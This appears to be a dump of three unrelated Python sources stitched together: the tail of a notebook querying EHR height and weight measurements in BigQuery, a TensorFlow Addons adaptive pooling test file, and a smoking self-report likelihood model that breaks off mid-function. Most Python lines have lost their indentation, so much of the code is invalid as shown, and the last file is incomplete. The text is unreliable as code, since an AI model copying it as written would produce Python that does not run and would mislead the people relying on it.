weight_distribution_by_site = weight_distribution_by_site.merge(temp_df, on=matching_cols)
# -
weight_distribution_by_site.to_csv(f"{cwd}/weight_analysis_by_site.csv")
weight_distribution_by_site
# ## Want to determine the number of sites per unit
all_unit_df = weight_unit_distribution.append(height_unit_distribution)
all_units = set(all_unit_df['unit_concept_id'].tolist())
all_units = list(all_units)
unit_concept_ids_as_str = str(all_units).strip('[]')
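# e.g., if all_units were [8713, 9529], this yields the string '8713, 9529'
# for splicing into the IN (...) clause below (example ids are hypothetical).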
sites_per_unit_query = f"""
SELECT
DISTINCT
m.unit_concept_id, c.concept_name as unit_concept_name,
    COUNT(DISTINCT mm.src_hpo_id) as num_sites
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}.concept` c
ON
m.unit_concept_id = c.concept_id
JOIN
`{DATASET}._mapping_measurement` mm
ON
m.measurement_id = mm.measurement_id
WHERE
m.unit_concept_id IN ({unit_concept_ids_as_str})
GROUP BY m.unit_concept_id, c.concept_name
ORDER BY num_sites DESC
"""
sites_per_unit = pd.io.gbq.read_gbq(sites_per_unit_query, dialect='standard')
sites_per_unit
# ## Now let's look at the variance for the height/weight based on the unit_concept_id
height_distribution_by_unit_query = f"""
SELECT
DISTINCT
m.unit_concept_id, c2.concept_name as unit_name, c2.standard_concept as unit_standard_concept,
m.measurement_concept_id, c.concept_name as measurement_concept,
ROUND(MIN(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as min,
ROUND(MAX(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as max,
ROUND(AVG(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as mean,
ROUND(STDDEV_POP(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as stdev,
COUNT(m.measurement_id) OVER (PARTITION BY m.unit_concept_id) as num_rows
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}.concept` c
ON
m.measurement_concept_id = c.concept_id
JOIN
`{DATASET}.concept` c2
ON
m.unit_concept_id = c2.concept_id
JOIN
`{DATASET}._mapping_measurement` mm
ON
m.measurement_id = mm.measurement_id
WHERE
m.measurement_concept_id IN (3036277, 3023540, 3019171)
GROUP BY m.unit_concept_id, c2.concept_name, c2.standard_concept,
m.measurement_concept_id, c.concept_name, m.value_as_number, m.measurement_id
ORDER BY unit_concept_id DESC, mean DESC
"""
height_distribution_by_unit = pd.io.gbq.read_gbq(height_distribution_by_unit_query, dialect='standard')
# +
temp_df = sites_per_unit[['unit_concept_id', 'num_sites']]
matching_cols = ['unit_concept_id']
height_distribution_by_unit = height_distribution_by_unit.merge(temp_df, on=matching_cols)
# -
height_distribution_by_unit.to_csv(f"{cwd}/height_analysis_by_unit.csv")
height_distribution_by_unit
weight_distribution_by_unit_query = f"""
SELECT
DISTINCT
m.unit_concept_id, c2.concept_name as unit_name, c2.standard_concept as unit_standard_concept,
m.measurement_concept_id, c.concept_name as measurement_concept,
ROUND(MIN(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as min,
ROUND(MAX(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as max,
ROUND(AVG(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as mean,
ROUND(STDDEV_POP(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as stdev,
COUNT(m.measurement_id) OVER (PARTITION BY m.unit_concept_id) as num_rows
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}.concept` c
ON
m.measurement_concept_id = c.concept_id
JOIN
`{DATASET}.concept` c2
ON
m.unit_concept_id = c2.concept_id
JOIN
`{DATASET}._mapping_measurement` mm
ON
m.measurement_id = mm.measurement_id
WHERE
m.measurement_concept_id IN (3025315, 3013762, 3023166)
GROUP BY m.unit_concept_id, c2.concept_name, c2.standard_concept,
m.measurement_concept_id, c.concept_name, m.value_as_number,
m.measurement_id
ORDER BY unit_concept_id DESC, mean DESC
"""
weight_distribution_by_unit = pd.io.gbq.read_gbq(weight_distribution_by_unit_query, dialect='standard')
# +
temp_df = sites_per_unit[['unit_concept_id', 'num_sites']]
matching_cols = ['unit_concept_id']
weight_distribution_by_unit = weight_distribution_by_unit.merge(temp_df, on=matching_cols)
# -
weight_distribution_by_unit.to_csv(f"{cwd}/weight_analysis_by_unit.csv")
weight_distribution_by_unit
# =============================================================================
# File: tensorflow_addons/layers/tests/adaptive_pooling_test.py
# Repo: Susmit-A/addons @ 01d0dd9355cb8fc3962991ac6f49d851bd64e8d1 (Apache-2.0)
# =============================================================================
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for AdaptivePooling layers."""
import pytest
import numpy as np
from tensorflow_addons.layers import adaptive_pooling
from tensorflow_addons.utils import test_utils
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
def test_avg_1d():
valid_input = np.arange(start=0.0, stop=12.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 12, 1))
output = np.array([1.0, 4.0, 7.0, 10.0]).astype(np.float32)
output = np.reshape(output, (1, 4, 1))
test_utils.layer_test(
adaptive_pooling.AdaptiveAveragePooling1D,
kwargs={"output_size": 4, "data_format": "channels_last"},
input_data=valid_input,
expected_output=output,
)
valid_input = np.arange(start=0.0, stop=12.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 1, 12))
output = np.array([1.0, 4.0, 7.0, 10.0]).astype(np.float32)
output = np.reshape(output, (1, 1, 4))
test_utils.layer_test(
adaptive_pooling.AdaptiveAveragePooling1D,
kwargs={"output_size": 4, "data_format": "channels_first"},
input_data=valid_input,
expected_output=output,
)
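# Editorial note: the expected values above follow from averaging four equal
# bins of the 12 inputs; e.g., np.arange(12.0).reshape(4, 3).mean(axis=1)
# gives array([ 1.,  4.,  7., 10.]).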
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
def test_avg_2d():
valid_input = np.arange(start=0.0, stop=40.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 4, 10, 1))
output = np.array([[7.0, 12.0], [27.0, 32.0]]).astype(np.float32)
output = np.reshape(output, (1, 2, 2, 1))
test_utils.layer_test(
adaptive_pooling.AdaptiveAveragePooling2D,
kwargs={"output_size": (2, 2), "data_format": "channels_last"},
input_data=valid_input,
expected_output=output,
)
valid_input = np.arange(start=0.0, stop=40.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 1, 4, 10))
output = np.array([[7.0, 12.0], [27.0, 32.0]]).astype(np.float32)
output = np.reshape(output, (1, 1, 2, 2))
test_utils.layer_test(
adaptive_pooling.AdaptiveAveragePooling2D,
kwargs={"output_size": (2, 2), "data_format": "channels_first"},
input_data=valid_input,
expected_output=output,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
def test_avg_3d():
valid_input = np.arange(start=0.0, stop=80.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 4, 10, 2, 1))
output = np.array(
[[[14.0, 15.0], [24.0, 25.0]], [[54.0, 55.0], [64.0, 65.0]]]
).astype(np.float32)
output = np.reshape(output, (1, 2, 2, 2, 1))
test_utils.layer_test(
adaptive_pooling.AdaptiveAveragePooling3D,
kwargs={"output_size": (2, 2, 2), "data_format": "channels_last"},
input_data=valid_input,
expected_output=output,
)
valid_input = np.arange(start=0.0, stop=80.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 1, 4, 10, 2))
output = np.array(
[[[14.0, 15.0], [24.0, 25.0]], [[54.0, 55.0], [64.0, 65.0]]]
).astype(np.float32)
output = np.reshape(output, (1, 1, 2, 2, 2))
test_utils.layer_test(
adaptive_pooling.AdaptiveAveragePooling3D,
kwargs={"output_size": (2, 2, 2), "data_format": "channels_first"},
input_data=valid_input,
expected_output=output,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
def test_max_1d():
valid_input = np.arange(start=0.0, stop=12.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 12, 1))
output = np.array([2.0, 5.0, 8.0, 11.0]).astype(np.float32)
output = np.reshape(output, (1, 4, 1))
test_utils.layer_test(
adaptive_pooling.AdaptiveMaxPooling1D,
kwargs={"output_size": 4, "data_format": "channels_last"},
input_data=valid_input,
expected_output=output,
)
valid_input = np.arange(start=0.0, stop=12.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 1, 12))
output = np.array([2.0, 5.0, 8.0, 11.0]).astype(np.float32)
output = np.reshape(output, (1, 1, 4))
test_utils.layer_test(
adaptive_pooling.AdaptiveMaxPooling1D,
kwargs={"output_size": 4, "data_format": "channels_first"},
input_data=valid_input,
expected_output=output,
)
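# Editorial note: max pooling keeps each bin's largest element; e.g.,
# np.arange(12.0).reshape(4, 3).max(axis=1) gives array([ 2.,  5.,  8., 11.]).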
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
def test_max_2d():
valid_input = np.arange(start=0.0, stop=40.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 4, 10, 1))
output = np.array([[14.0, 19.0], [34.0, 39.0]]).astype(np.float32)
output = np.reshape(output, (1, 2, 2, 1))
test_utils.layer_test(
adaptive_pooling.AdaptiveMaxPooling2D,
kwargs={"output_size": (2, 2), "data_format": "channels_last"},
input_data=valid_input,
expected_output=output,
)
valid_input = np.arange(start=0.0, stop=40.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 1, 4, 10))
output = np.array([[14.0, 19.0], [34.0, 39.0]]).astype(np.float32)
output = np.reshape(output, (1, 1, 2, 2))
test_utils.layer_test(
adaptive_pooling.AdaptiveMaxPooling2D,
kwargs={"output_size": (2, 2), "data_format": "channels_first"},
input_data=valid_input,
expected_output=output,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
def test_max_3d():
valid_input = np.arange(start=0.0, stop=80.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 4, 10, 2, 1))
output = np.array(
[[[28.0, 29.0], [38.0, 39.0]], [[68.0, 69.0], [78.0, 79.0]]]
).astype(np.float32)
output = np.reshape(output, (1, 2, 2, 2, 1))
test_utils.layer_test(
adaptive_pooling.AdaptiveMaxPooling3D,
kwargs={"output_size": (2, 2, 2), "data_format": "channels_last"},
input_data=valid_input,
expected_output=output,
)
valid_input = np.arange(start=0.0, stop=80.0, step=1.0).astype(np.float32)
valid_input = np.reshape(valid_input, (1, 1, 4, 10, 2))
output = np.array(
[[[28.0, 29.0], [38.0, 39.0]], [[68.0, 69.0], [78.0, 79.0]]]
).astype(np.float32)
output = np.reshape(output, (1, 1, 2, 2, 2))
test_utils.layer_test(
adaptive_pooling.AdaptiveMaxPooling3D,
kwargs={"output_size": (2, 2, 2), "data_format": "channels_first"},
input_data=valid_input,
expected_output=output,
)
# =============================================================================
# File: methods/tie_together/smart-proposal.py
# Repo: wdempsey/sense2stop-lvm @ ea44d5f9199382d30e4c5a5ff4bd524313ceb5b2 (CECILL-B)
# =============================================================================
# %%
from multiprocessing import Pool
import time
import numpy as np
from scipy.stats import mvn
import os
import pickle
import copy
import matplotlib.pyplot as plt
from scipy import interpolate
from scipy.stats import norm
# %%
# Helper functions
def grow_tree(depth):
    if depth == 1:
        current_data = [0, 1]
        return current_data
elif depth > 1:
        current_data = [0, 1]
        curr_level = 2
while curr_level <= depth:
# Sweep through all leaves at the current level
list_curr_level = list(np.repeat(np.nan, repeats=2**curr_level))
for i in range(0, len(current_data)):
left_leaf = np.append(np.array(current_data[i]), 0)
right_leaf = np.append(np.array(current_data[i]), 1)
list_curr_level[2*i] = list(left_leaf)
list_curr_level[2*i + 1] = list(right_leaf)
# Go one level below
current_data = list_curr_level
curr_level += 1
return current_data
else:
return 0
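# Illustrative note (added): grow_tree(depth) enumerates all 2**depth binary
# labellings of `depth` leaves; EODSurvey.calc_loglik uses them as patterns of
# integration limits. For example:
#   grow_tree(1) -> [0, 1]
#   grow_tree(2) -> [[0, 0], [0, 1], [1, 0], [1, 1]]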
# %%
class Latent:
'''
A collection of objects and methods related to latent process subcomponent
'''
def __init__(self, participant = None, day = None, latent_data = None, params = None, index = None):
self.participant = participant
self.day = day
self.latent_data = copy.deepcopy(latent_data)
self.params = copy.deepcopy(params)
self.index = index
def update_params(self, new_params):
'''
Update parameters
'''
self.params = copy.deepcopy(new_params)
def calc_loglik(self):
'''
Calculate loglikelihood for latent process subcomponent
'''
smoking_times = self.latent_data['hours_since_start_day']
day_length = self.latent_data['day_length']
lambda_prequit = self.params['lambda_prequit']
lambda_postquit = self.params['lambda_postquit']
# Calculate the total number of latent smoking times in the current iteration
m = len(smoking_times)
# lambda_prequit: number of events per hour during prequit period
# lambda_postquit: number of events per hour during postquit period
# day_length: total number of hours between wakeup time to sleep time on a given participant day
if self.day <4:
lik = np.exp(-lambda_prequit*day_length) * ((lambda_prequit*day_length) ** m) / np.math.factorial(m)
loglik = np.log(lik)
else:
lik = np.exp(-lambda_postquit*day_length) * ((lambda_postquit*day_length) ** m) / np.math.factorial(m)
loglik = np.log(lik)
return loglik
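# Editorial sketch (not in the original source): the same Poisson
# loglikelihood can be evaluated directly on the log scale, which avoids
# overflow in np.math.factorial(m) when m is large; with lam the pre- or
# post-quit rate, as appropriate:
#   loglik = -lam * day_length + m * np.log(lam * day_length) - np.math.lgamma(m + 1)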
# %%
class EODSurvey:
'''
A collection of objects and methods related to end-of-day survey subcomponent
'''
def __init__(self, participant = None, day = None, latent_data = None, observed_data = None, params = None, index = None):
self.participant = participant
self.day = day
self.latent_data = copy.deepcopy(latent_data)
self.observed_data = copy.deepcopy(observed_data)
self.params = copy.deepcopy(params)
self.index = index
def update_params(self, new_params):
'''
Update parameters
'''
self.params = copy.deepcopy(new_params)
def calc_loglik(self):
'''
Calculate loglikelihood corresponding to end-of-day EMA subcomponent
'''
# Inputs to be checked ----------------------------------------------------------------------------
any_eod_ema = len(self.observed_data['assessment_begin'])
if any_eod_ema > 0:
# Begin after checks on inputs have been passed ---------------------------------------------------
# Go through each box one by one
collect_box_probs = np.array([])
arr_ticked = self.observed_data['ticked_box_raw'] # which boxes were ticked?
m = len(self.latent_data['hours_since_start_day']) # are there any latent smoking events?
all_boxes = np.array([8,9,10,11,12,13,14,15,16,17,18,19,20])
if (m == 0) and (len(arr_ticked) == 0):
collect_box_probs = np.repeat(1, len(all_boxes))
elif (m == 0) and (len(arr_ticked) > 0):
collect_box_probs = np.repeat(0, len(all_boxes))
else:
start_day = 0
end_day = 24
# Rescale time to be within 24 hour clock
all_true_smoke_times = self.latent_data['hours_since_start_day'] + self.observed_data['start_time_hour_of_day']
for k in range(0, len(all_boxes)):
curr_box = all_boxes[k] # lower limit of Box k; setting curr_lk and curr_box to be separate variables in case change of scale is needed for curr_lk
curr_lk = all_boxes[k] # lower limit of Box k
curr_uk = curr_lk + 1 # upper limit of Box k; add one hour to lower limit
recall_epsilon = self.params['recall_epsilon'] # in hours
num_points_to_sample = self.params['budget']
if len(all_true_smoke_times) <= num_points_to_sample:
true_smoke_times = all_true_smoke_times
else:
true_smoke_times = all_true_smoke_times[(all_true_smoke_times > curr_lk - recall_epsilon) * (all_true_smoke_times < curr_uk + recall_epsilon)]
if len(true_smoke_times) > num_points_to_sample:
true_smoke_times = np.random.choice(a = true_smoke_times, size = num_points_to_sample, replace = False)
# At this point, the length of true_smoke_times will always be at most num_points_to_sample
if len(true_smoke_times) > 0:
# Specify covariance matrix based on an exchangeable correlation matrix
rho = self.params['rho']
use_cormat = np.eye(len(true_smoke_times)) + rho*(np.ones((len(true_smoke_times),1)) * np.ones((1,len(true_smoke_times))) - np.eye(len(true_smoke_times)))
use_sd = self.params['sd']
use_covmat = (use_sd**2) * use_cormat
# Calculate total possible probability
total_possible_prob, error_code_total_possible_prob = mvn.mvnun(lower = np.repeat(start_day, len(true_smoke_times)),
upper = np.repeat(end_day, len(true_smoke_times)),
means = true_smoke_times,
covar = use_covmat)
# Begin calculating edge probabilities
collect_edge_probabilities = np.array([])
limits_of_integration = grow_tree(depth=len(true_smoke_times))
for j in range(0, len(limits_of_integration)):
curr_limits = np.array(limits_of_integration[j])
curr_lower_limits = np.where(curr_limits==0, start_day, curr_uk)
curr_upper_limits = np.where(curr_limits==0, curr_lk, end_day)
edge_probabilities, error_code_edge_probabilities = mvn.mvnun(lower = curr_lower_limits,
upper = curr_upper_limits,
means = true_smoke_times,
covar = use_covmat)
collect_edge_probabilities = np.append(collect_edge_probabilities, edge_probabilities)
total_edge_probabilities = np.sum(collect_edge_probabilities)
prob_none_recalled_within_current_box = total_edge_probabilities/total_possible_prob
# prob_none_recalled_within_current_box may be slightly above 1, e.g., 1.000000XXXXX
if (prob_none_recalled_within_current_box-1) > 0:
prob_none_recalled_within_current_box = 1
prob_at_least_one_recalled_within_box = 1-prob_none_recalled_within_current_box
else:
prob_none_recalled_within_current_box = 1
prob_at_least_one_recalled_within_box = 1-prob_none_recalled_within_current_box
# Exit the first IF-ELSE statement
if curr_box in arr_ticked:
collect_box_probs = np.append(collect_box_probs, prob_at_least_one_recalled_within_box)
else:
collect_box_probs = np.append(collect_box_probs, prob_none_recalled_within_current_box)
# Exit if-else statement
prob_observed_box_checking_pattern = np.prod(collect_box_probs)
loglik = np.log(prob_observed_box_checking_pattern)
self.observed_data['prob_bk'] = collect_box_probs
self.observed_data['product_prob_bk'] = prob_observed_box_checking_pattern
self.observed_data['log_product_prob_bk'] = loglik
else:
# If participant did not complete EOD survey, then this measurement type should NOT contribute to the loglikelihood
loglik = 0
return loglik
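# Editorial note: the edge-probability loop above makes one mvn.mvnun call per
# leaf of grow_tree, i.e., 2**len(true_smoke_times) rectangle integrals per
# end-of-day box (plus one call for the total probability); the 'budget'
# parameter exists to cap that exponent.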
# %%
class SelfReport:
def __init__(self, participant = None, day = None, latent_data = None, observed_data = None, params = None, index = None):
self.participant = participant
self.day = day
self.latent_data = copy.deepcopy(latent_data)
self.observed_data = copy.deepcopy(observed_data)
self.params = copy.deepcopy(params)
self.index = index
def update_params(self, new_params):
'''
Update parameters
'''
self.params = copy.deepcopy(new_params)
def match(self):
'''
Matches each EMA with one latent smoking time occurring before the Self Report EMA
After a latent smoking time is matched, it is removed
'''
# Inputs to be checked --------------------------------------------
all_latent_times = self.latent_data['hours_since_start_day']
tot_ema = len(self.observed_data['assessment_type'])
if tot_ema > 0:
self.observed_data['matched_latent_time'] = np.repeat(np.nan, tot_ema)
remaining_latent_times = copy.deepcopy(all_latent_times)
remaining_latent_times = np.sort(remaining_latent_times)
for i in range(0, tot_ema):
current_lb = self.observed_data['assessment_begin_shifted'][i]
current_ub = self.observed_data['assessment_begin'][i]
#current_assessment_type = self.observed_data['assessment_type'][i]
which_within = (remaining_latent_times >= 0) & (remaining_latent_times < current_ub)
if np.sum(which_within)>0:
which_idx = np.where(which_within)
matched_idx = np.max(which_idx)
matched_latent_time = remaining_latent_times[matched_idx]
self.observed_data['matched_latent_time'][i] = matched_latent_time
remaining_latent_times = np.delete(remaining_latent_times, matched_idx)
remaining_latent_times = np.sort(remaining_latent_times)
else:
# This case can occur when between time 0 and time t there is no
# latent smoking time, but a self-report occurred between time 0 and time t
# This case may happen after a dumb death move
self.observed_data['matched_latent_time'][i] = np.nan
else:
self.observed_data['matched_latent_time'] = np.array([])
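    # Illustrative example (assumed data, not from the source): with latent
    # times [1.0, 2.5, 6.0] and EMAs delivered at hours 3.0 and 7.0, match()
    # pairs the first EMA with 2.5 and the second with 6.0, leaving 1.0
    # unmatched.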
def calc_loglik(self):
'''
Call the method calc_loglik after the method match has been called
Calculate loglikelihood corresponding to self report EMA subcomponent
'''
# Inputs to be checked --------------------------------------------
all_latent_times = np.sort(self.latent_data['hours_since_start_day'])
tot_latent_events = len(all_latent_times)
if len(self.observed_data['assessment_type']) == 0:
tot_sr = 0
else:
# Total number of Self-Report
tot_sr = np.sum(self.observed_data['assessment_type']=='selfreport')
# Specify parameter values ----------------------------------------
lambda_delay = self.params['lambda_delay']
use_scale = self.params['sd']
prob_reporting_when_any = self.params['prob_reporting_when_any']
prob_reporting_when_none = self.params['prob_reporting_when_none']
        if tot_latent_events == 0 and tot_sr > 0:
# Note: in this case, any Self-Report EMA cannot be matched to a latent smoking time
# This case could happen if, for example, previous move might have been a 'death'
# but participant initiated at least one self-report.
# Assume that participant can lie/misremember when they Self-Report
total_lik = prob_reporting_when_none**tot_sr
total_loglik = np.log(total_lik)
elif tot_latent_events > 0 and tot_sr == 0:
# Note: in this case, latent smoking times exist but they were not reported in a Self Report EMA
# This case could happen if, for example, previous move might have been a 'birth'
# but there was no self-report observed.
# Assume that participant does not lie when they Self-Report
# However, participant may neglect to Self-Report a smoking incident
# for example, due to burden
total_lik = (1 - prob_reporting_when_any)**tot_latent_events
total_loglik = np.log(total_lik)
elif tot_latent_events > 0 and tot_sr > 0:
total_loglik = 0
# Subcomponent due to delay ---------------------------------------
self.observed_data['delay'] = self.observed_data['assessment_begin'] - self.observed_data['matched_latent_time']
total_loglik += tot_sr * np.log(lambda_delay) - lambda_delay * np.nansum(self.observed_data['delay'])
# Subcomponent due to recall --------------------------------------
tot_ema = len(self.observed_data['assessment_order'])
self.observed_data['prob_bk'] = np.repeat(np.nan, tot_ema)
self.observed_data['log_prob_bk'] = np.repeat(np.nan, tot_ema)
tot_sr_with_matched = 0
for i in range(0, tot_ema):
if self.observed_data['assessment_type'][i]=='selfreport':
current_lb = self.observed_data['assessment_begin_shifted'][i]
current_ub = self.observed_data['assessment_begin'][i]
curr_matched_time = self.observed_data['matched_latent_time'][i]
# Check: Is current Self-Report EMA matched to any latent smoking time?
if np.isnan(curr_matched_time):
# Current Self-Report EMA is NOT matched to any latent smoking time
self.observed_data['prob_bk'][i] = prob_reporting_when_none
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
else:
# Current Self-Report EMA is matched to a latent smoking time
tot_sr_with_matched += 1 # update counter
# Calculate numerator of bk
windowtag = self.observed_data['windowtag'][i]
# Note: each value of windowtag corresponds to a response option in hours
                        # use_this_window_max will be based on time when previous EMA was delivered
use_this_window_min = {1: 0/60, 2: 5/60, 3: 15/60, 4: 30/60}
use_this_window_max = {1: 5/60, 2: 15/60, 3: 30/60, 4: np.nan}
# upper limit of integration
current_uk = self.observed_data['assessment_begin'][i] - use_this_window_min[windowtag]
if windowtag == 4:
if self.observed_data['assessment_begin_shifted'][i] > current_uk:
current_lk = self.observed_data['assessment_begin_shifted'][i] - 24 # subtract 24 hours
else:
current_lk = self.observed_data['assessment_begin_shifted'][i]
else:
current_lk = self.observed_data['assessment_begin'][i] - use_this_window_max[windowtag]
# Calculate denominator of bk
if current_lk <= current_lb:
total_prob_constrained_lb = norm.cdf(x = current_lk, loc = curr_matched_time, scale = use_scale)
else:
total_prob_constrained_lb = norm.cdf(x = current_lb, loc = curr_matched_time, scale = use_scale)
total_prob_constrained_ub = norm.cdf(x = current_ub, loc = curr_matched_time, scale = use_scale)
tot_prob_constrained = total_prob_constrained_ub - total_prob_constrained_lb
prob_constrained_lk = norm.cdf(x = current_lk, loc = curr_matched_time, scale = use_scale)
prob_constrained_uk = norm.cdf(x = current_uk, loc = curr_matched_time, scale = use_scale)
if (prob_constrained_uk - prob_constrained_lk) == tot_prob_constrained:
self.observed_data['prob_bk'][i] = (current_uk - current_lk)/(current_ub - current_lb)
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
else:
self.observed_data['prob_bk'][i] = (prob_constrained_uk - prob_constrained_lk)/tot_prob_constrained
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
# We have already exited the for loop
total_loglik += np.nansum(self.observed_data['log_prob_bk'])
# Subcomponent due to propensity to self-report
total_loglik += tot_sr_with_matched * np.log(prob_reporting_when_any) + (tot_latent_events - tot_sr_with_matched) * np.log(1-prob_reporting_when_any)
        else:  # tot_latent_events == 0 and tot_sr == 0
total_lik = 1
total_loglik = np.log(total_lik)
return total_loglik
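# Editorial summary: the self-report loglikelihood combines three pieces: an
# Exponential(lambda_delay) density for the report delay, a truncated-Normal
# recall probability for the chosen windowtag bin (with a uniform fallback),
# and Bernoulli terms for whether a matched latent event was reported at all.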
# %%
class RandomEMA:
def __init__(self, participant = None, day = None, latent_data = None, observed_data = None, params = None, index = None):
self.participant = participant
self.day = day
self.latent_data = copy.deepcopy(latent_data)
self.observed_data = copy.deepcopy(observed_data)
self.params = copy.deepcopy(params)
self.index = index
def update_params(self, new_params):
'''
Update parameters
'''
self.params = copy.deepcopy(new_params)
def match(self):
'''
Matches each EMA with one latent smoking time occurring before the Random EMA
After a latent smoking time is matched, it is removed
'''
# Inputs to be checked --------------------------------------------
all_latent_times = self.latent_data['hours_since_start_day']
tot_ema = len(self.observed_data['assessment_type'])
if tot_ema > 0:
self.observed_data['matched_latent_time'] = np.repeat(np.nan, tot_ema)
remaining_latent_times = copy.deepcopy(all_latent_times)
remaining_latent_times = np.sort(remaining_latent_times)
for i in range(0, tot_ema):
current_lb = self.observed_data['assessment_begin_shifted'][i]
current_ub = self.observed_data['assessment_begin'][i]
#current_assessment_type = self.observed_data['assessment_type'][i]
which_within = (remaining_latent_times >= 0) & (remaining_latent_times < current_ub)
if np.sum(which_within)>0:
which_idx = np.where(which_within)
matched_idx = np.max(which_idx)
matched_latent_time = remaining_latent_times[matched_idx]
self.observed_data['matched_latent_time'][i] = matched_latent_time
remaining_latent_times = np.delete(remaining_latent_times, matched_idx)
remaining_latent_times = np.sort(remaining_latent_times)
else:
# This case can occur when between time 0 and time t there is no
# latent smoking time, but a self-report occurred between time 0 and time t
# This case may happen after a dumb death move
self.observed_data['matched_latent_time'][i] = np.nan
else:
self.observed_data['matched_latent_time'] = np.array([])
def calc_loglik(self):
'''
Call the method calc_loglik after the method match has been called
Calculate loglikelihood corresponding to Random EMA subcomponent
'''
use_scale = self.params['sd']
prob_reporting_when_any = self.params['prob_reporting_when_any']
prob_reporting_when_none = self.params['prob_reporting_when_none']
all_latent_times = np.sort(self.latent_data['hours_since_start_day'])
tot_latent_events = len(all_latent_times)
tot_ema = len(self.observed_data['assessment_type'])
if tot_ema == 0:
tot_random_ema = 0
else:
tot_random_ema = np.sum(self.observed_data['assessment_type']=='random_ema')
self.observed_data['prob_bk'] = np.repeat(np.nan, tot_ema)
self.observed_data['log_prob_bk'] = np.repeat(np.nan, tot_ema)
if tot_random_ema > 0:
total_loglik = 0
# Note: each value of windowtag corresponds to a response option in hours
            # use_this_window_max will be based on time when previous EMA was delivered
use_this_window_min = {1: 0/60, 2: 20/60, 3: 40/60, 4: 60/60, 5: 80/60, 6: 100/60}
use_this_window_max = {1: 20/60, 2: 40/60, 3: 60/60, 4: 80/60, 5: 100/60, 6: np.nan}
for i in range(0, tot_ema):
if (self.observed_data['assessment_type'][i]=='random_ema') and (self.observed_data['smoke'][i]=='Yes'):
curr_matched_time = self.observed_data['matched_latent_time'][i]
if np.isnan(curr_matched_time):
self.observed_data['prob_bk'][i] = prob_reporting_when_none # i.e., prob of reporting when no latent smoking time can be matched
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
else:
current_lb = self.observed_data['assessment_begin_shifted'][i]
current_ub = self.observed_data['assessment_begin'][i]
windowtag = self.observed_data['windowtag'][i]
# upper limit of integration
current_uk = self.observed_data['assessment_begin'][i] - use_this_window_min[windowtag]
# lower limit of integration
if windowtag == 6:
if self.observed_data['assessment_begin_shifted'][i] > current_uk:
current_lk = self.observed_data['assessment_begin_shifted'][i] - 24 # subtract 24 hours
else:
current_lk = self.observed_data['assessment_begin_shifted'][i]
else:
current_lk = self.observed_data['assessment_begin'][i] - use_this_window_max[windowtag]
if (current_lk <= current_lb and current_uk <= current_lb):
# i.e., the upper bound and lower bound of the recalled smoking time both come before current_lb
# adding a point to this region should be a very unlikely occurrence
total_prob_constrained_lb = norm.cdf(x = current_lk, loc = curr_matched_time, scale = use_scale) # note that x = current_lk
total_prob_constrained_ub = norm.cdf(x = current_ub, loc = curr_matched_time, scale = use_scale)
tot_prob_constrained = total_prob_constrained_ub - total_prob_constrained_lb
prob_constrained_lk = norm.cdf(x = current_lk, loc = curr_matched_time, scale = use_scale)
prob_constrained_uk = norm.cdf(x = current_uk, loc = curr_matched_time, scale = use_scale)
if (prob_constrained_uk - prob_constrained_lk) == tot_prob_constrained:
self.observed_data['prob_bk'][i] = (current_uk - current_lk)/(current_ub - current_lb)
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
total_loglik += np.log(prob_reporting_when_any)
else:
self.observed_data['prob_bk'][i] = (prob_constrained_uk - prob_constrained_lk)/tot_prob_constrained
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
total_loglik += np.log(prob_reporting_when_any)
elif (current_lk <= current_lb and current_uk > current_lb):
# i.e., the lower bound of the recalled smoking time come before current_lb
# but the upper bound comes after current_lb
total_prob_constrained_lb = norm.cdf(x = current_lk, loc = curr_matched_time, scale = use_scale) # note that x = current_lk
total_prob_constrained_ub = norm.cdf(x = current_ub, loc = curr_matched_time, scale = use_scale)
tot_prob_constrained = total_prob_constrained_ub - total_prob_constrained_lb
